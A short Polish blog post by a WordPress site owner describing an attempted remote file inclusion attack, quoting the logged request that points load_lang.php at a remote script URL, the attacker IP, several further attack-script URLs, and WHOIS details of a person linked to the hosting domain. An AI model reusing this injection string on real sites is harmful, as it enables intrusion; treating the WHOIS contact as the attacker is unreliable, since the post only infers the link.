load_lang.php?_SERWEB[configdir]=
Takim o to zapytaniem ktoś próbował mi zhackować WordPressa a dokładniej:
/load_lang.php?_SERWEB[configdir]=http://for.caucasus.net/nit.txt?? |
Czyżby to była jakaś dziura w WordPress 2.8.2, spróbuję się dowiedzieć najpierw w rodzimym nieprzydanym języku potem pomęczę się z tłumaczeniem pytania to inglisz…
Wszystko z jednego IP: 67.215.229.226
Oczywiście jak najszybciej zaktualizowałem do 2.8.3, która jest wersją poprawiająca poprawki…
A co się znajdowało pod: http://for.caucasus.net/nit.txt
Otóż ciekawy i długi kod z którego można się wiele nauczyć. Tak pobieżnie: kasuje, robi kopie zapasową, wysyła co popadanie. przypomina to jakiegoś gotowca czy coś podobnego a no i wysyła wszystkie kopie plików na email.
jako że plugin do kolorowania składni wywala błąd 500 serwera to kod jest dostępny tu:
kod nit.txt Georgian hacker Nitrex
load_lang.php Remote File Inclusion Exploit to wiemy do czego skrypt jest
Nasz niedoszły hacker podpisuje się:
< ?
; – This Web Was Hacked And Rooted By Georgian Hacker Nitrex
?>;
Doszukując się dalszych powiązań:
person: Alexander Shakh-Nazarov
phone: +995 32 920000
e-mail: shakh@caucasus.net
nic-hdl: AS2778-RIPE
address: Caucasus Network
address: 42 Rustaveli ave.
address: Tbilisi, Georgia
Whois jednej z powiązanych domen.
I jeszcze trochę domen i skryptów:
http://www.geneseobeadstudio.com/safe.txt
http://www.geneseobeadstudio.com/cmd.txt
http://geocities.com/machinekill/cmd.txt
zhani-kalandadze.ge
Najnowsze komentarze